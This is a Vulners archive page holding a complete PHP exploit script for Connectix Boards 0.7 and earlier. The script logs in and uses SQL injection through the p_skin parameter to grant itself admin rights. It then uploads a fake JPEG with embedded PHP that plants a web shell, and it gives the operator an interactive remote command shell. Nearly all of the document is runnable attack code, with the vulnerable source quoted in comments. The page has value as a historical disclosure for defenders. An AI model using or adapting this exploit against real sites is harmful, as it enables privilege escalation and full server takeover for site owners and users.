Vulners
Lucene search
connectix-multi.txt
`#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 9) {
print("
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
-------------------------------------------------------------------
PHP conditions: none
Credits: DarkFig <[email protected]>
URL: http://www.acid-root.new.fr/
-------------------------------------------------------------------
Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
Params: -url For example http://victim.com/connectix/
-usr The username of your account
-pwd The password of your account
-type Privilege Escalation(1) or Code execution(2)
Options: -proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
-------------------------------------------------------------------
"); exit(1);
}
$url = getparam('url',1);
$user = getparam('usr',1);
$pass = getparam('pwd',1);
$type = getparam('type',1);
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$theme = 'Zephyr';
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print "\nTrying to get logged in";
$xpl->post($url.'index.php?act=login',"username=$user&password=$pass&remember=on&confirm=Connexion+%21");
if(preg_match("#password#",$xpl->showcookie())) print "\nLogged in";
else exit("\nExploit failed");
sploit(", usr_class=1");
if($type==1) exit("\nDone, $user is now admin.");
# Fake JPG (with php code) generated with edjpgcom.exe
#
# <?php $handle=fopen('mdrpipicacalolxdwtf.gif.php','w+');
# fwrite($handle,'<?php @system($_SERVER[HTTP_REFERER]); ?/>');
# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
#
$f = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00\xFF"
."\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14"
."\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24"
."\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39"
."\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18"
."\x0D\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00"
."\xA5\x3C\x3F\x70\x68\x70\x20\x24\x68\x61\x6E\x64\x6C\x65\x3D\x66\x6F\x70\x65\x6E"
."\x28\x27\x6D\x64\x72\x70\x69\x70\x69\x63\x61\x63\x61\x6C\x6F\x6C\x78\x64\x77\x74"
."\x66\x2E\x67\x69\x66\x2E\x70\x68\x70\x27\x2C\x27\x77\x2B\x27\x29\x3B\x66\x77\x72"
."\x69\x74\x65\x28\x24\x68\x61\x6E\x64\x6C\x65\x2C\x27\x3C\x3F\x70\x68\x70\x20\x40"
."\x73\x79\x73\x74\x65\x6D\x28\x24\x5F\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50"
."\x5F\x52\x45\x46\x45\x52\x45\x52\x5D\x29\x3B\x20\x3F\x3E\x27\x29\x3B\x66\x63\x6C"
."\x6F\x73\x65\x28\x24\x68\x61\x6E\x64\x6C\x65\x29\x3B\x20\x75\x6E\x6C\x69\x6E\x6B"
."\x28\x24\x5F\x53\x45\x52\x56\x45\x52\x5B\x50\x48\x50\x5F\x53\x45\x4C\x46\x5D\x29"
."\x3B\x20\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01"
."\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00"
."\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5"
."\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03"
."\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1"
."\x08\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19"
."\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48"
."\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74"
."\x75\x76\x77\x78\x79\x7A\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97"
."\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9"
."\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1"
."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF"
."\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
."\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01"
."\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05"
."\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1"
."\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19\x1A"
."\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53"
."\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77"
."\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99"
."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2"
."\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4"
."\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03"
."\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9";
# +admin.bbcode.php
# |
# 95. if(isset($_POST['wherefile'])) {
# 96. if ($_POST['wherefile']=='upload') {
# 97. if (!empty($_FILES['uploadimage']['size'])){
# 98. if ($image=getimagesize(trim($_FILES['uploadimage']['tmp_name']))) {
# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);
# 100. if ($_FILES['uploadimage']['size'] <= 20480 && in_array($image[2],$val)) {
# 101. $filename = $smile->smiley_librariesdir.$_POST['sm_filenameserver'];
# 102. $filename = str_replace('../','',trim($filename));
# 103. //si le filenameserver contient un dossier : on crée ce dossier:
# 104. mkdirs($smile->smiley_dir.dirname($filename));
# 105. if (move_uploaded_file($_FILES['uploadimage']['tmp_name'], $smile->smiley_dir.$_POST['sm_filenameserver'])) {
# 106. $do=true;
# 107. }
#
$arr = array(frmdt_url => $url.'admin.php?act=bb&sub=4',
"sm_name" => ":AbCdEfGhIj1234dsupersmilepowaa:",
"sm_filenamesubdir" => "libraries/",
"sm_filenameserver" => "xd.gif.php",
"wherefile" => "upload",
"sm_send" => "Confirmer",
"uploadimage" => array(frmdt_type => "image/gif",
frmdt_filename => "xd.gif.php",
frmdt_content => $f));
$xpl->formdata($arr);
$xpl->get($url."smileys/xd.gif.php");
print "\n\$shell> ";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
$xpl->addheader("Referer",$cmd);
$xpl->get($url."smileys/mdrpipicacalolxdwtf.gif.php");
print $xpl->getcontent()."\n\$shell> ";
}
function sploit($sql)
{
global $url,$xpl,$theme,$user;
$pdat = "changeparams=1"
."&p_usrs=20"
."&p_topics=20"
."&p_msgs=15"
."&p_res=12"
."&p_skin=$theme"
."%00',usr_pref_skin='$theme',usr_signature=(SELECT '[XPL_IS_OK]')$sql WHERE usr_name='$user' #"
."&p_lang=fr"
."&p_timezone=1";
# +common.php
# |
# 95. function cleanArray(&$arr) {
# 96. if (!empty($arr) && is_array($arr)) {
# 97. foreach($arr as $k => $v) {
# 98. if (is_array($v)) cleanArray($arr[$k]);
# 99. else $arr[$k] = stripslashes($v);
# 100. }
# 101. }
# 102. }
# |
# 105. if (get_magic_quotes_gpc()) {
# 106. cleanArray($_POST);
# 107. cleanArray($_COOKIE);
# 108. cleanArray($_GET);
# 109. }
#
# +part.userprofile.php
# |
# 305. /* Changement des paramètres d'affichage (pas accessible par les modos ou admins) */
# 306. } elseif (isset($_POST['changeparams']) && $edit_id==$_SESSION['userid']) {
# 307. if ( isset($_POST['p_usrs'],$_POST['p_topics'],$_POST['p_msgs'],$_POST['p_res'],$_POST['p_skin'],$_POST['p_lang'],$_POST['p_timezone']) ) {
# 308. if (is_numeric($_POST['p_usrs']) && is_numeric($_POST['p_topics']) && is_numeric($_POST['p_msgs']) && is_numeric($_POST['p_res']) && isLang($_POST['p_lang']) && isSkin($_POST['p_skin'])) {
# 309. if ((int)$_POST['p_usrs']>=5 && (int)$_POST['p_usrs']<=50 && (int)$_POST['p_topics']>=5 && (int)$_POST['p_topics']<=50 && (int)$_POST['p_msgs']>=5 && (int)$_POST['p_msgs']<=50 && (int)$_POST['p_res']>=5 && (int)$_POST['p_res']<=50 && in_array($_POST['p_timezone'],array_keys($timezones))) {
# 310. $GLOBALS['cb_db']->query("UPDATE ".$GLOBALS['cb_db']->prefix."users SET usr_pref_msgs='".(int)$_POST['p_msgs']."',usr_pref_usrs='".(int)$_POST['p_usrs']."',usr_pref_topics='".(int)$_POST['p_topics']."',usr_pref_res='".(int)$_POST['p_res']."',usr_pref_lang='".$_POST['p_lang']."',usr_pref_skin='".$_POST['p_skin']."',usr_pref_timezone='".$_POST['p_timezone']."',usr_pref_ctsummer=".((int)(isset($_POST['p_ctsummer']) && $_POST['p_ctsummer']=='on'))." WHERE usr_id=".$_SESSION['cb_user']->userid);
# 311. $_SESSION['cb_user']->reloadnext=true;
# 312. redirect(manage_url('index.php?act=user&editprofile='.$_SESSION['userid'].'&page=6','forum-profile'.$_SESSION['userid'].'-params.html'));
#
# +lib.cb.php
# |
# 117. function isLang ($langtype) {
# 118. return is_dir(CB_PATH.'lang/'.$langtype);
# 119. }
# |
# 133. function isSkin ($skintype) {
# 134. return is_dir(CB_PATH.'skins/'.$skintype);
# 135. }
$xpl->post($url."index.php?act=user&editprofile=-1&page=6",$pdat);
$xpl->get($url."index.php?act=user&editprofile=-1&page=5");
if(preg_match('#[XPL_IS_OK]#',$xpl->getcontent())) return;
else exit("Exploit failed");
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2007 00:00Current